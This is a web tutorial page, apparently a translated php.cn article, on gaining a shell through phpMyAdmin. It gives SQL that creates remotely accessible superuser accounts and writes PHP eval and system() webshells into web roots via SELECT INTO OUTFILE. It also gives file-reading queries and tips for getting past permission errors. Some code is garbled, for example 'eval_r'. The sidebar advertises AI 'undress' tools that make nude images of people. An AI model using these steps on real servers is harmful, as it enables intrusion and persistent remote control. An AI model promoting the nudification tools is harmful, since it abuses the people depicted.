Summary PHPmyadmin takes shell-phpMyAdmin-php.cn

Home

Database

phpMyAdmin

Summary PHPmyadmin takes shell

藏色散人

Jan 04, 2021 pm 02:37 PM

phpmyadmin

The following is a summary for everyone in the phpmyadmin usage tutorial columnphpmyadminGet the shell, I hope it will be helpful to friends in need!

Summary PHPmyadmin takes shell

PHPmyadmin takes shell summary

PHPmyadmin changes user password

Click directly on localhost or 1270.0.1 above, the user column will appear, click to modify

Add the super user guesssec password ooxx and allow external connections

GRANT ALL PRIVILEGES ON *.* TO &#39;guetsec&#39;@&#39;%&#39; IDENTIFIED BY &#39;ooxx&#39; WITH GRANT OPTION;

We can create a root account and set a password

GRANT ALL PRIVILEGES ON *.* TO &#39;root&#39;@&#39;%&#39; IDENTIFIED BY &#39;123456&#39; WITH GRANT OPTION;

In this way, a root external link account is created, the password is 123456, use 123456 for external links

Four classic methods of using shell:

Method one:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

Method two:

读取文件内容：    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话：    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限：    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Method three:

JhackJ version PHPmyadmin takes shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

Method 4:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Then visit the website directory: http://www.2cto.com/study.php?cmd=dir

Phpmyadmin appears when exporting a sentence (Errcode: 13 - Permission denied)

There is no permission for this directory. You can try the upper-level directory or the lower-level directory

If that doesn’t work, try NTS traffic

Also, pay attention to the directory\

The above is the detailed content of Summary PHPmyadmin takes shell. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undress AI Tool

Undress images for free

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to report an impersonation account on Instagram

3 weeks ago By 下次还敢

How to Change ChatGPT Personality in Settings (Cynic, Robot, Listener, Nerd)

3 weeks ago By DDD

Wuchang: Fallen Feathers - Dragon Emperor Zhu Youjian Boss Fight Guide

4 weeks ago By DDD

How to Fight Eris in Neon Abyss

3 weeks ago By Jack chen

Pokémon TCG Scarlet & Violet: Black Bolt Elite Trainer Box Review

4 weeks ago By Jack chen

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

PHP Tutorial

1598

276

Related knowledge

How to set primary key in phpmyadmin Apr 07, 2024 pm 02:54 PM

The primary key of a table is one or more columns that uniquely identify each record in the table. Here are the steps to set a primary key: Log in to phpMyAdmin. Select database and table. Check the column you want to use as the primary key. Click "Save Changes". Primary keys provide data integrity, lookup speed, and relationship modeling benefits.

How to add foreign keys in phpmyadmin Apr 07, 2024 pm 02:36 PM

Adding a foreign key in phpMyAdmin can be achieved by following these steps: Select the parent table that contains the foreign key. Edit the parent table structure and add new columns in "Columns". Enable foreign key constraints and select the referencing table and key. Set update/delete operations. save Changes.

How to delete data table in phpmyadmin Apr 07, 2024 pm 03:00 PM

Steps to delete a data table in phpMyAdmin: Select the database and data table; click the "Action" tab; select the "Delete" option; confirm and perform the deletion operation.

Where does the wordpress database exist? Apr 15, 2024 pm 10:39 PM

The WordPress database is housed in a MySQL database that stores all website data and can be accessed through your hosting provider’s dashboard, FTP, or phpMyAdmin. The database name is related to the website URL or username, and access requires the use of database credentials, including name, username, password, and hostname, which are typically stored in the "wp-config.php" file.

What should I do if navicat cannot connect? Apr 23, 2024 am 10:00 AM

When Navicat cannot connect, you can try the following solutions in order: Check whether the connection information is correct, such as database name, host name, port number, user name and password. Make sure the database is up and running. Check the firewall rules to confirm that Navicat and related services are not blocked. Try using the ping command to test your network connection. Update Navicat client software to the latest version. Check the server logs for error messages related to failed connections. Try connecting using other database tools to troubleshoot Navicat-specific issues.

How to set foreign keys in phpmyadmin Apr 07, 2024 pm 03:03 PM

How to set up foreign keys? Create main table and sub-table. Open the phpMyAdmin dashboard. Select the main table. Open the "Structure" tab. Add a foreign key column and select the related column in the child table. Select the foreign key type (such as "CASCADE"). save Changes.

What to do if the installation of phpmyadmin fails Apr 07, 2024 pm 03:15 PM

Troubleshooting steps for failed phpMyAdmin installation: Check system requirements (PHP version, MySQL version, web server); enable PHP extensions (mysqli, pdo_mysql, mbstring, token_get_all); check configuration file settings (host, port, username, password); Check file permissions (directory ownership, file permissions); check firewall settings (whitelist web server ports); view error logs (/var/log/apache2/error.log or /var/log/nginx/error.log); seek Technical support (phpMyAdmin

How to export excel using phpmyadmin Apr 07, 2024 pm 02:24 PM

Export data to Excel format via phpMyAdmin: After logging in to phpMyAdmin, select the database and table to export. Click the "Export" option and select "Excel" in the "Format" drop-down menu. Choose your own export columns, query options, and other export options. Click the "Dump" button to start the export and download the exported Excel file.

See all articles